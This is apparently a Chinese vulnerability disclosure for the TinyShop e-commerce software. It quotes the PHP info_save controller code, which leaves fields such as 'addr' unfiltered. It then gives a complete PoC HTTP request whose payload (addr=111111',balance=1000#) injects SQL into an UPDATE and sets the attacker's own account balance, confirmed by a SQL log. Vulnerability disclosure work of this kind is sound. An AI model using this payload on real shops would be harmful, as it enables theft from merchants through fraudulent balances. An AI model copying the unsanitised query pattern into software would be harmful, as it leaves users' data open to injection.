Tinyshop刷钱漏洞

### 简要描述： 听说通用型给力了，来测试下 ### 详细说明： 之前看到一个它的刷钱漏洞，不过补了，后来一看还是可以。。,只修复之前的post覆盖data数组 /protected/controllers/ucenter.php,393行 ``` public function info_save() { $rules = array('name:required:昵称不能为空!','real_name:required:真实姓名不能为空!','sex:int:性别必需选择！','birthday:date:生日日期格式不正确！','mobile:mobi:手机格式不正确','phone:phone:电话格式不正确'); $info = Validator::check($rules); if(is_array($info)){ $this->redirect("info",false,array('msg'=>array("info",$info['msg']))); }else{ $data = array( 'name'=>Filter::str(Req::args('name')), 'real_name'=>Filter::str(Req::args('real_name')), 'sex'=>Filter::int(Req::args('sex')), 'birthday'=>Req::args('birthday'), 'mobile'=>Req::args('mobile'), 'phone'=>Req::args('phone'), 'province'=>Req::args('province'), 'city'=>Req::args('city'), 'county'=>Req::args('county'), 'addr'=>Filter::text(Req::args('addr')) ); } $name = Filter::sql(Req::args("name")); $id = $this->user['id']; $this->model->table("user")->data(array("name"=>$name))->where("id=$id")->update(); $this->model->table("customer")->data($data)->where("user_id=$id")->update(); $obj = $this->model->table("user as us")->join("left join customer as cu on us.id = cu.user_id")->fields("us.*,cu.group_id,cu.login_time")->where("us.id=$id")->find(); $this->safebox->set('user',$obj,$this->cookie_time); $this->redirect("info"); } ``` 从上面来看以下地方的过滤都是有问题的 ``` 'birthday'=>Req::args('birthday'), 'mobile'=>Req::args('mobile'), 'phone'=>Req::args('phone'), 'province'=>Req::args('province'), 'city'=>Req::args('city'), 'county'=>Req::args('county'), 'addr'=>Filter::text(Req::args('addr')) ``` 导致可以注入，但是我们并不关心这个，因为用户账户余额的字段banlance也是在这个表中，所以我们可以通过update操作给自己刷钱，而不是用这个注入来盲注。 ### 漏洞证明： poc: ``` POST /tinyshop/index.php?con=ucenter&act=info_save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://localhost/tinyshop/index.php?con=ucenter&act=info Cookie: CNZZDATA80862620=cnzz_eid%3D163438544-1407551214-http%253A%252F%252Flocalhost%252F%26ntime%3D1408007142; bdshare_firstime=1407551237892; tm_ibc=0; ZDEDebuggerPresent=php,phtml,php3; CNZZDATA1670348=cnzz_eid%3D2114245156-1409299086-http%253A%252F%252Flocalhost%252F%26ntime%3D1409299086; ver=free; PHPSESSID=f2943c79c9d287ef2a0136f0525e9fb3; language=5ad2ae3c20c17a82d4b61aaa71f61e05f5b4a0a2s%3A5%3A%22zh_cn%22%3B; 1_product=f5de13e802a02fac20482edfe9ee2d303641bc6ds%3A1%3A%221%22%3B; pageSize=7fe99f844d5233ed16ab2d46f0b885fe7b213e04s%3A2%3A%2220%22%3B; safecode=1; Tiny_autologin=ed6460c9a8OTU2Nzg2NTAwMmFiNDQ9NTsyMzBjOGJlNjAyZjJlY2c Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 161 name=test1%40qq.com&real_name=1&sex=0&birthday=2014-09-30&mobile=13900000001&phone=13222222222&province=420000&city=421300&county=421301&addr=111111',balance=1000# ``` SQL查询日志： ``` 187323 Query update tiny_customer set `real_name` = '1',`sex` = 0,`birthday` = '2014-09-30',`mobile` = '13900000001',`phone` = '13222222222',`province` = 420000,`city` = 421300,`county` = 421301,`addr` = '111111',balance=1000#' where user_id=4 ``` 看看结果： [<img src="https://images.seebug.org/upload/201409/031517519ca32430289cd834cdba3f5b62f01aca.jpg" alt="tinyshop_1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/031517519ca32430289cd834cdba3f5b62f01aca.jpg)